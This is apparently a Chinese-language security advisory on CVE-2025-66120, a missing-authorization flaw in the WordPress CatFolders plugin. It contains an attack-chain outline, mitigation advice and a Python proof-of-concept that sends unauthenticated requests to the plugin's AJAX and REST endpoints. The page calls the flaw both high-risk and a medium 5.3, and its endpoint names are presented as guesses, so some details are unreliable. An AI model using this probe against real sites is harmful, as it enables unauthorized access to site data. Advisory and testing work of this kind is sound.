CVE-2025-66120: WordPress CatFolders插件缺失授权漏洞导致未授权访问

漏洞信息

漏洞编号

CVE-2025-66120

漏洞类型

缺失授权/访问控制

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress CatFolders插件

漏洞概述

CVE-2025-66120是WordPress CatFolders插件中的一个高危安全漏洞，属于Missing Authorization（缺失授权）类型。该漏洞存在于CatFolders插件的访问控制机制中，由于插件在处理用户请求时未能正确验证用户的访问权限，导致攻击者可以在未经授权的情况下访问本应受保护的文件夹内容。CatFolders是一款广受欢迎的WordPress文件夹管理插件，帮助用户组织和管理媒体库及帖子分类。该插件在WordPress生态系统中拥有大量安装用户，因此此漏洞的影响范围较广。攻击者利用此漏洞可以绕过正常的访问控制检查，获取敏感信息或执行未授权操作。漏洞的CVSS评分为5.3，属于中等严重程度，主要影响机密性。由于该漏洞不需要任何认证且可通过网络直接利用，攻击者可以在无需任何用户交互的情况下发起攻击。

技术细节

CatFolders插件在版本2.5.3及之前版本中存在访问控制缺陷。具体问题在于插件的某些功能端点缺少适当的权限检查（capability check），导致任何匿名用户或低权限用户都可以直接访问本应需要高级权限才能查看的文件夹数据。漏洞主要出现在插件处理AJAX请求和REST API端点时，这些端点直接响应用户请求而未验证用户是否具有相应的访问权限。攻击者可以通过构造特定的HTTP请求，直接访问受保护的API端点，如获取文件夹列表、查看文件夹内容或修改文件夹配置等。由于WordPress的文件夹管理功能通常与媒体库和帖子内容相关，攻击者可能利用此漏洞获取敏感的业务信息。此外，该漏洞还可能被用于进一步的攻击链中，结合其他漏洞或社会工程学手段造成更大危害。修复此漏洞需要在所有相关端点添加适当的权限验证检查，确保只有具有相应权限的用户才能访问受保护的功能。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标WordPress网站，并确认CatFolders插件版本 <= 2.5.3

STEP 2

步骤2

构造请求：攻击者分析CatFolders插件的API端点，识别缺少权限检查的AJAX或REST API端点

STEP 3

步骤3

未授权访问：攻击者直接向目标端点发送HTTP请求，无需提供有效的认证凭证或nonce

STEP 4

步骤4

数据提取：成功访问后，攻击者获取敏感文件夹信息、媒体库内容或分类结构等数据

STEP 5

步骤5

横向移动或数据利用：攻击者利用获取的信息进行进一步攻击，如社会工程、敏感数据窃取或权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66120 PoC - CatFolders Missing Authorization
# This PoC demonstrates accessing protected endpoints without authorization

import requests
import sys

def check_vulnerability(target_url):
    """
    Check if the target WordPress site with CatFolders plugin is vulnerable
    """
    # Common CatFolders AJAX endpoints
    endpoints = [
        '/wp-admin/admin-ajax.php',
        '/wp-json/catfolders/v1/folders',
        '/wp-json/catfolders/v1/terms'
    ]
    
    # Try to access without authentication
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        
        # Test with minimal headers
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        
        # For AJAX endpoint, try common CatFolders actions
        if 'admin-ajax.php' in endpoint:
            data = {
                'action': 'catfolders_get_folders',
                'nonce': ''  # Try without nonce
            }
            try:
                response = requests.post(url, data=data, headers=headers, timeout=10)
                if response.status_code == 200:
                    print(f"[!] Endpoint {endpoint} responded without authentication")
                    print(f"[+] Response preview: {response.text[:200]}")
                    return True
            except requests.RequestException as e:
                print(f"[-] Error accessing {endpoint}: {e}")
        else:
            try:
                response = requests.get(url, headers=headers, timeout=10)
                if response.status_code == 200 and 'catfolders' in response.text.lower():
                    print(f"[!] REST endpoint {endpoint} accessible without auth")
                    return True
            except requests.RequestException as e:
                print(f"[-] Error accessing {endpoint}: {e}")
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-66120.py <target_url>')
        print('Example: python cve-2025-66120.py http://example.com')
        sys.exit(1)
    
    target = sys.argv[1]
    print(f'[*] Checking vulnerability on: {target}')
    
    if check_vulnerability(target):
        print('[!] Target appears to be VULNERABLE')
    else:
        print('[+] Target appears to be PATCHED or not vulnerable')

影响范围

CatFolders插件 <= 2.5.3

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 限制对/wp-admin/admin-ajax.php和REST API端点的访问，只允许已登录用户访问；2) 使用WordPress的安全插件如Wordfence或Sucuri添加额外的访问控制层；3) 监控服务器日志以检测异常的API访问模式；4) 考虑暂时禁用CatFolders插件直到安全更新可用；5) 确保所有用户使用强密码并启用双因素认证以减少账户被盗用的风险。